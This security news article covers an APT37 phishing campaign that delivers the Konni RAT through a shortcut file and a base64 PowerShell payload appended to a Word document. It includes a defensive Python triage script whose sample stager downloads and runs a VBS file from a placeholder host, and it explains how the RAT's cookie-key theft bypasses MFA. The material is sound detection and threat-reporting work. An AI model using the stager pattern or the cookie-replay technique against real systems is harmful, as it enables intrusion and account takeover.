The North Korea-linked APT37 group is targeting high-value organizations in the Czech Republic, Poland and other countries.
Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in several countries including the Czech Republic and Poland. Researchers attribute this campaign to the North Korea-linked APT37 group, also known as Ricochet Chollima.
The attackers deployed the Konni RAT (Remote Access Trojan), which was first documented by Cisco Talos researchers in 2017 but is believed to have been in use since 2014 in highly targeted attacks without being detected. The RAT has evaded detection thanks to continuous development; it is capable of executing arbitrary code on target systems and stealing data.
The Konni RAT has been attributed to North Korea-linked threat actors tracked as Thallium and APT37.
The attack chain begins with phishing messages that try to trick the recipient into opening a malicious attachment.
The attachment used in this campaign is an archive containing a Word document (missile.docx) and a Windows shortcut file (_weapons.doc.lnk.lnk).
Infection begins when the victim opens the LNK file.
“Code execution starts with embedding small snippets of code in the shortcut file, which runs along with the intended binary and executes when the user double-clicks it,” reads the analysis published by the experts. “This code runs and executes base64 encoded text appended to the end of the missile.docx file.”
The decoded payload is a PowerShell script that contacts the C2 server to download and run two files, weapons.doc and wp.vbs.
weapons.doc is a decoy document, while wp.vbs runs silently in the background and creates a scheduled task named “Office Update” on the host that runs a Base64-encoded PowerShell script.
At this point C2 communication is re-established, giving the attackers access to the system.
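The appended-payload trick in the lure document is simple to check for: a .docx is a ZIP archive, and nothing legitimate follows its end-of-central-directory record. The Python below is an added example, not code from the Securonix report or from the malware. It builds a minimal .docx-shaped ZIP in memory, appends a constructed base64-encoded stager (the script text and the example.invalid URLs are placeholders, not indicators from the campaign), and then shows how a triage script locates the bytes after the ZIP container, decodes them and pulls out the download URLs.

```python
import base64
import binascii
import io
import re
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory record signature
EOCD_FIXED_LEN = 22        # fixed part of the record; a variable-length comment may follow
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Constructed stand-in for the stager; the example.invalid URLs are placeholders, not campaign IOCs.
SAMPLE_STAGER = (
    "$d=$env:TEMP;"
    "iwr 'http://example.invalid/weapons.doc' -OutFile \"$d\\weapons.doc\";"
    "iwr 'http://example.invalid/wp.vbs' -OutFile \"$d\\wp.vbs\";"
    "wscript \"$d\\wp.vbs\""
)


def build_docx_like(appended: bytes = b"") -> bytes:
    """Minimal ZIP with the layout of a .docx, with arbitrary bytes glued on after the EOCD record."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue() + appended


def build_sample_lure(utf16: bool = False) -> bytes:
    """Constructed lure: the stager is base64-encoded and appended to the end of the document."""
    raw = SAMPLE_STAGER.encode("utf-16-le" if utf16 else "utf-8")
    return build_docx_like(base64.b64encode(raw))


def zip_end_offset(data: bytes) -> int:
    """Offset one past the end of the ZIP container (EOCD record plus its optional comment)."""
    # The last EOCD signature is the real one: base64 text cannot contain the 0x05 byte,
    # so appended base64 data never produces a false match.
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or len(data) < eocd + EOCD_FIXED_LEN:
        raise ValueError("no end-of-central-directory record found")
    comment_len = struct.unpack_from("<H", data, eocd + 20)[0]
    return eocd + EOCD_FIXED_LEN + comment_len


def appended_payload(data: bytes) -> bytes:
    """Bytes that follow the ZIP container. A clean Office document has none."""
    return data[zip_end_offset(data):]


def analyze(data: bytes) -> dict:
    """Report trailing data and, when it is base64, the decoded script and any URLs it contains."""
    tail = appended_payload(data).strip()
    result = {"trailing_bytes": len(tail), "script": None, "urls": []}
    if not tail:
        return result
    try:
        raw = base64.b64decode(tail, validate=True)
    except binascii.Error:
        return result  # trailing bytes that are not base64 still deserve a look
    # PowerShell -EncodedCommand payloads are UTF-16LE; a NUL at offset 1 is the cheap tell.
    if raw[1:2] == b"\x00":
        text = raw.decode("utf-16-le", errors="replace")
    else:
        text = raw.decode("utf-8", errors="replace")
    result["script"] = text
    result["urls"] = URL_RE.findall(text)
    return result


if __name__ == "__main__":
    print(analyze(build_sample_lure()))
```

Run `analyze()` over the bytes of any .docx/.xlsx/.pptx pulled from a mail gateway or quarantine: a non-zero `trailing_bytes` on an Office document is a strong signal on its own, and the decoded script gives the download URLs to block and hunt for.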
Once the Konni RAT has been loaded onto the infected system, threat actors can use specific modules to perform the following functions:
- Capture.net.exe – Capture screenshots using the Win32 GDI API and upload the zipped results to the C2 server.
- chkey.net.exe – Extract the state key, the browser's cookie-encryption key stored in the Local State file and protected with DPAPI. With this key the attackers can decrypt the cookie database and replay the victim's session cookies, which lets them bypass MFA on accounts the victim is already logged into.
- pull.net.exe – Extract saved credentials from victim’s web browsers.
- shell.net.exe – Set up a remote interactive shell that fetches and runs commands every 10 seconds.
To further maintain persistence, the attackers deploy a modified version of the Konni malware, delivered as a .cab file that contains several related components (.bat, .dll, .dat and .ini files).
The experts also raise the possibility of a false flag operation in which the Russia-linked APT28 group masquerades as APT37.
“Also, there appears to be a direct correlation between IP addresses, hosting providers, and hostnames between this attack and historical data that we saw previously from FancyBear/APT28. In the end, what makes this particular case interesting is the use of Konni malware in conjunction with tradecraft similarities to APT28,” concludes the report.